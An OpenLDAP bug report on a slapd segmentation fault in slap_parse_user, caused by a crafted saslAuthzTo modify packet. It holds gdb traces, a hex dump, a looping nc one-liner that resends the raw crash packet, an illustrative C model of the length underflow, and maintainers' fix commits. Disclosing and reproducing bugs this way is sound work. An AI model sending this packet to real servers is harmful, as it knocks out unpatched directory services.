Issue 9413 - Packet sometimes crashes openldap due to SIGSEGV in slap_parse_user, related to saslAuthzTo
Status: VERIFIED FIXED
Alias: None
Product: OpenLDAP
Classification: Unclassified
Component: slapd
Version: unspecified
Hardware: All
Target Milestone: 2.4.57
Assignee: OpenLDAP project
URL:
Keywords:
Depends on:
Blocks:
 
Reported: 2020-12-01 10:16 UTC by phasip
Modified: 2021-01-18 20:06 UTC

Description phasip 2020-12-01 10:16:44 UTC
A packet sometimes crashes openldap.

Thread 3 "slapd" hit Breakpoint 1, slap_parse_user (
    id=id@entry=0x7fff8aace860, user=user@entry=0x7fff8aace870, 
    realm=realm@entry=0x7fff8aace880, mech=mech@entry=0x7fff8aace890)
    at saslauthz.c:163
163			realm->bv_val = ber_bvchr( mech, '/' );
(gdb) x/x mech->bv_len
0xfffffffffffffffd:	Cannot access memory at address 0xfffffffffffffffd
(gdb) c
Continuing.

Thread 3 "slapd" received signal SIGSEGV, Segmentation fault.
__memchr_avx2 () at ../sysdeps/x86_64/multiarch/memchr-avx2.S:177

    
Packet:
    00000000: 3076 0201 8c66 3382 00cb 1e06 437e 0100  0v...f3.....C~..
    00000010: 3b3e 7d0b 7361 736c 4175 7468 7a54 6f42  ;>}.saslAuthzToB
    00000020: 113d 001f 1500 4707 753a 3a2e 4b37 7878  .=....G.u::.K7xx
    00000030: 017d c420 5bbb 19a8 1dad ef0c be46 0407  .}. [........F..
    00000040: 0fda f98d d6d3 f220 eae1 34a9 2bb2 d8a3  ....... ..4.+...
    00000050: 49af c341 69c1 4cd9 f00e e75c 05d6 2f90  I..Ai.L....\../.
    00000060: 79a6 930c 16e6 724e 135a 8d4c 9bdf 33db  y.....rN.Z.L..3.
    00000070: f3b9 256c 1a26 2060 2154 26ec 7cc7 3096  ..%l.& `!T&.|.0.
    00000080: 6fdc 92ea 295d 816d 8146 563b 3688 b2b4  o...)].m.FV;6...
    00000090: 2c20 d668 c91c 8c7a eb0d 3aca 8dbd 6fe1  , .h...z..:...o.
    000000a0: 58dd de97 bd3e 1d6a 13db 55fc be4a b5f4  X....>.j..U..J..
    000000b0: c660 f734 935d 5eea af28 8ef4 332c e9e3  .`.4.]^..(..3,..
    000000c0: e66d 1ab5 6372 c5f4 7802 f6f8 3301 7d5d  .m..cr..x...3.}]
    000000d0: 0f0b 5f38 e453 ec4e b733 a72f c687 2e0c  .._8.S.N.3./....
    000000e0: 009b 2588 9f8a a5                        ..%....



Gdb output:
    Starting program: /openldap/servers/slapd/slapd -h ldap://:1389/ -d 256
    [Thread debugging using libthread_db enabled]
    Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
    5fc616d5 @(#) $OpenLDAP: slapd 2.X (Dec  1 2020 08:25:21) $
        @1f8f0c8d0e86:/openldap/servers/slapd
    5fc616d5 slapd starting
    [New Thread 0x7fff8b2d3700 (LWP 27)]
    [New Thread 0x7fff8aad2700 (LWP 28)]
    5fc616d5 conn=1000 fd=11 ACCEPT from IP=[::1]:43154 (IP=[::]:1389)
    [New Thread 0x7fff8a2d1700 (LWP 29)]
    5fc616d5 conn=1000 op=0 MOD dn=""
    5fc616d5 conn=1000 op=0 MOD attr=saslAuthzTo
    [Switching to Thread 0x7fff8aad2700 (LWP 28)]

    Thread 3 "slapd" hit Breakpoint 1, slap_parse_user (
        id=id@entry=0x7fff8aace860, user=user@entry=0x7fff8aace870, 
        realm=realm@entry=0x7fff8aace880, mech=mech@entry=0x7fff8aace890)
        at saslauthz.c:163
    163			realm->bv_val = ber_bvchr( mech, '/' );
    (gdb) x/x mech->bv_len
    0xfffffffffffffffd:	Cannot access memory at address 0xfffffffffffffffd
    (gdb) x/x mech        
    0x7fff8aace890:	0xfffffffd
    (gdb) x/x mech->bv_val
    0x7fff8aace8a4:	0x0078374b
    (gdb) c
    Continuing.

    Thread 3 "slapd" received signal SIGSEGV, Segmentation fault.
    __memchr_avx2 () at ../sysdeps/x86_64/multiarch/memchr-avx2.S:177
    177	../sysdeps/x86_64/multiarch/memchr-avx2.S: No such file or directory.
    (gdb) bt
    #0  __memchr_avx2 () at ../sysdeps/x86_64/multiarch/memchr-avx2.S:177
    #1  0x00005555555cb6e1 in slap_parse_user (id=id@entry=0x7fff8aace860, 
        user=user@entry=0x7fff8aace870, realm=realm@entry=0x7fff8aace880, 
        mech=mech@entry=0x7fff8aace890) at saslauthz.c:163
    #2  0x00005555555cbf56 in authzPrettyNormal (val=val@entry=0x7fff7c0013e0, 
        normalized=normalized@entry=0x7fff8aad09b0, ctx=ctx@entry=0x0, 
        normalize=normalize@entry=0) at saslauthz.c:632
    #3  0x00005555555cdaa2 in authzPretty (syntax=<optimized out>, 
        val=0x7fff7c0013e0, out=0x7fff8aad09b0, ctx=0x0) at saslauthz.c:905
    #4  0x000055555559e6ce in ordered_value_pretty (ad=ad@entry=0x5555557934c0, 
        val=0x7fff7c0013e0, out=out@entry=0x7fff8aad09b0, ctx=ctx@entry=0x0)
        at value.c:511
    #5  0x000055555559a505 in slap_mods_check (op=op@entry=0x7fff7c000ff0, 
        ml=0x7fff7c101660, text=text@entry=0x7fff8aad1aa0, 
        textbuf=textbuf@entry=0x7fff8aad0a20 "saslAuthzTo", 
        textlen=textlen@entry=256, ctx=ctx@entry=0x0) at modify.c:574
    #6  0x000055555559b77e in do_modify (op=0x7fff7c000ff0, rs=0x7fff8aad1a80)
        at modify.c:165
    #7  0x0000555555583a59 in connection_operation (ctx=ctx@entry=0x7fff8aad1ba0, 
        arg_v=0x7fff7c000ff0) at connection.c:1163
    #8  0x00005555555840c0 in connection_read_thread (ctx=0x7fff8aad1ba0, argv=0xb)
        at connection.c:1314
    #9  0x0000555555670dbc in ldap_int_thread_pool_wrapper (xpool=0x555555798340)
        at tpool.c:1051
    #10 0x00007ffff7faa609 in start_thread (arg=<optimized out>)
        at pthread_create.c:477
    #11 0x00007ffff7ed1293 in clone ()
        at ../sysdeps/unix/sysv/linux/x86_64/clone.S:95
    (gdb) 


Testing:
    (Alternative to using docker hub: docker build -t phasip/openldap https://github.com/Phasip/openldap-docker.git#main)
    (Also works on 2.4.56 bitnami image bitnami/openldap )
    docker run --privileged -it --net=host --entrypoint gdb phasip/openldap /openldap/servers/slapd/slapd -ex 'set args -h ldap://:1389/ -d 256' -ex 'run'
    while true; do echo -en '\x30\x76\x02\x01\x8c\x66\x33\x82\x00\xcb\x1e\x06\x43\x7e\x01\x00\x3b\x3e\x7d\x0b\x73\x61\x73\x6c\x41\x75\x74\x68\x7a\x54\x6f\x42\x11\x3d\x00\x1f\x15\x00\x47\x07\x75\x3a\x3a\x2e\x4b\x37\x78\x78\x01\x7d\xc4\x20\x5b\xbb\x19\xa8\x1d\xad\xef\x0c\xbe\x46\x04\x07\x0f\xda\xf9\x8d\xd6\xd3\xf2\x20\xea\xe1\x34\xa9\x2b\xb2\xd8\xa3\x49\xaf\xc3\x41\x69\xc1\x4c\xd9\xf0\x0e\xe7\x5c\x05\xd6\x2f\x90\x79\xa6\x93\x0c\x16\xe6\x72\x4e\x13\x5a\x8d\x4c\x9b\xdf\x33\xdb\xf3\xb9\x25\x6c\x1a\x26\x20\x60\x21\x54\x26\xec\x7c\xc7\x30\x96\x6f\xdc\x92\xea\x29\x5d\x81\x6d\x81\x46\x56\x3b\x36\x88\xb2\xb4\x2c\x20\xd6\x68\xc9\x1c\x8c\x7a\xeb\x0d\x3a\xca\x8d\xbd\x6f\xe1\x58\xdd\xde\x97\xbd\x3e\x1d\x6a\x13\xdb\x55\xfc\xbe\x4a\xb5\xf4\xc6\x60\xf7\x34\x93\x5d\x5e\xea\xaf\x28\x8e\xf4\x33\x2c\xe9\xe3\xe6\x6d\x1a\xb5\x63\x72\xc5\xf4\x78\x02\xf6\xf8\x33\x01\x7d\x5d\x0f\x0b\x5f\x38\xe4\x53\xec\x4e\xb7\x33\xa7\x2f\xc6\x87\x2e\x0c\x00\x9b\x25\x88\x9f\x8a\xa5' | nc localhost 1389; done
    
Bugfix:
    It may be enough to fix the mech->bv_len calculation on line 161 of saslauthz.c.
    However, as we have reported multiple issues in saslauthz there could be some common cause for all of them.
    saslauthz.c:161: mech->bv_len = user->bv_val - mech->bv_val - 1;
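The length arithmetic behind the SIGSEGV, as an added illustration that is not OpenLDAP source and not the reporter's code. It models the split that slap_parse_user() performs on an authzId of the form "u[.mech[/realm]]:user" (the form assumed here), feeds it the saslAuthzTo value "u::.K7x" carried by the packet above (bytes 75 3a 3a 2e 4b 37 78), and reproduces the bv_len of 0xfffffffffffffffd that the gdb session shows at saslauthz.c:163. The struct berval and bvchr() helper mirror liblber's berval and ber_bvchr() in shape only; the PARSE_* codes, the parse_cstr/parse_status/mech_len wrappers and the "hardened" variant are this illustration's own assumptions, not the upstream patch.

```c
/*
 * Added illustration for ITS#9413, not OpenLDAP source. Models the split
 * slap_parse_user() performs on "u[.mech[/realm]]:user" (assumed form) and
 * reproduces the saslauthz.c:161 arithmetic for the packet's value "u::.K7x".
 */
#include <stddef.h>
#include <stdio.h>
#include <string.h>

struct berval {              /* same shape as liblber's berval */
    size_t bv_len;
    char  *bv_val;
};

enum { PARSE_OK = 0, PARSE_PROTOCOL_ERROR = -1, PARSE_WOULD_OVERREAD = -2 };

/* bounded search like ber_bvchr(): NULL when the byte is absent */
static char *bvchr(const struct berval *bv, int c)
{
    return bv->bv_len ? memchr(bv->bv_val, c, bv->bv_len) : NULL;
}

/*
 * hardened == 0: pre-fix arithmetic as quoted in the report. The '.' is
 *   searched in the whole id, so a '.' after the ':' lands in the user part
 *   and "user - mech - 1" goes negative; stored unsigned it is the huge
 *   length that ber_bvchr(mech, '/') then hands to memchr().
 * hardened == 1: only a '.' in front of the ':' counts as the mech separator
 *   (illustrative fix; the upstream commit is not reproduced here).
 * The input is left intact: the real function writes NULs over the
 * separators, which does not change the lengths computed below.
 */
static int parse_user(const struct berval *id, int hardened,
                      struct berval *user, struct berval *mech,
                      struct berval *realm)
{
    memset(user, 0, sizeof *user);
    memset(mech, 0, sizeof *mech);
    memset(realm, 0, sizeof *realm);

    if (id->bv_len == 0 || (id->bv_val[0] != 'u' && id->bv_val[0] != 'U'))
        return PARSE_PROTOCOL_ERROR;

    char *colon = bvchr(id, ':');
    if (colon == NULL)
        return PARSE_PROTOCOL_ERROR;
    user->bv_val = colon + 1;
    user->bv_len = id->bv_len - (size_t)(user->bv_val - id->bv_val);

    /* "u.mech/realm" is everything in front of the ':' */
    struct berval prefix = { (size_t)(colon - id->bv_val), id->bv_val };
    char *dot = bvchr(hardened ? &prefix : id, '.');
    if (dot == NULL)
        return PARSE_OK;                 /* plain "u:user", no mech part */

    mech->bv_val = dot + 1;
    /* saslauthz.c:161 as reported: signed pointer difference stored unsigned */
    mech->bv_len = (size_t)(user->bv_val - mech->bv_val - 1);

    /* The real code now calls ber_bvchr(mech, '/'); refuse to read past the
     * id here instead of letting memchr() walk off the end of the buffer. */
    if (mech->bv_len > id->bv_len)
        return PARSE_WOULD_OVERREAD;

    char *slash = bvchr(mech, '/');
    if (slash != NULL) {
        realm->bv_val = slash + 1;
        realm->bv_len = (size_t)(user->bv_val - realm->bv_val - 1);
        mech->bv_len  = (size_t)(realm->bv_val - mech->bv_val - 1);
    }
    return PARSE_OK;
}

/* C-string wrappers (one static buffer, not reentrant; illustration only) */
static int parse_cstr(const char *s, int hardened, struct berval *user,
                      struct berval *mech, struct berval *realm)
{
    static char buf[256];
    snprintf(buf, sizeof buf, "%s", s);
    struct berval id = { strlen(buf), buf };
    return parse_user(&id, hardened, user, mech, realm);
}

static int parse_status(const char *s, int hardened)
{
    struct berval u, m, r;
    return parse_cstr(s, hardened, &u, &m, &r);
}

static size_t mech_len(const char *s, int hardened)
{
    struct berval u, m, r;
    parse_cstr(s, hardened, &u, &m, &r);
    return m.bv_len;
}

int main(void)
{
    /* constructed inputs; the first is the saslAuthzTo value from the packet */
    const char *samples[] = { "u::.K7x", "u:bob.smith", "u.DIGEST-MD5/example.com:alice" };
    for (int h = 0; h < 2; h++)
        for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
            struct berval u, m, r;
            int rc = parse_cstr(samples[i], h, &u, &m, &r);
            printf("%-8s %-32s rc=%2d mech.bv_len=%#zx user=%.*s\n",
                   h ? "hardened" : "pre-fix", samples[i], rc, m.bv_len,
                   (int)u.bv_len, u.bv_val ? u.bv_val : "");
        }
    return 0;
}
```

With "u::.K7x" the ':' is at offset 1, so user->bv_val is offset 2, the '.' at offset 3 puts mech->bv_val at offset 4, and 2 - 4 - 1 = -3 becomes 0xfffffffffffffffd once stored in the unsigned bv_len; memchr() is then asked to scan that many bytes, which is the __memchr_avx2 frame in the backtrace. Any '.' inside the user part ("u:bob.smith") produces the same underflow under the pre-fix arithmetic, so the fix has to keep the mech search in front of the ':' rather than just clamp the length.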
Comment 1 Howard Chu 2020-12-01 21:33:41 UTC
(In reply to phasip from comment #0)
> A packet sometimes crashes openldap.
> 
> Thread 3 "slapd" hit Breakpoint 1, slap_parse_user (
>     id=id@entry=0x7fff8aace860, user=user@entry=0x7fff8aace870, 
>     realm=realm@entry=0x7fff8aace880, mech=mech@entry=0x7fff8aace890)
>     at saslauthz.c:163
> 163			realm->bv_val = ber_bvchr( mech, '/' );
> (gdb) x/x mech->bv_len
> 0xfffffffffffffffd:	Cannot access memory at address 0xfffffffffffffffd
> (gdb) c
> Continuing.

Fixed in git master
Comment 2 Quanah Gibson-Mount 2020-12-02 22:00:02 UTC
trunk:

  • e394bcfa by Howard Chu at 2020-12-01T19:05:06+00:00
    ITS#9413 fix slap_parse_user

RE24:

  • d169e795 by Howard Chu at 2020-12-02T21:48:18+00:00
    ITS#9413 fix slap_parse_user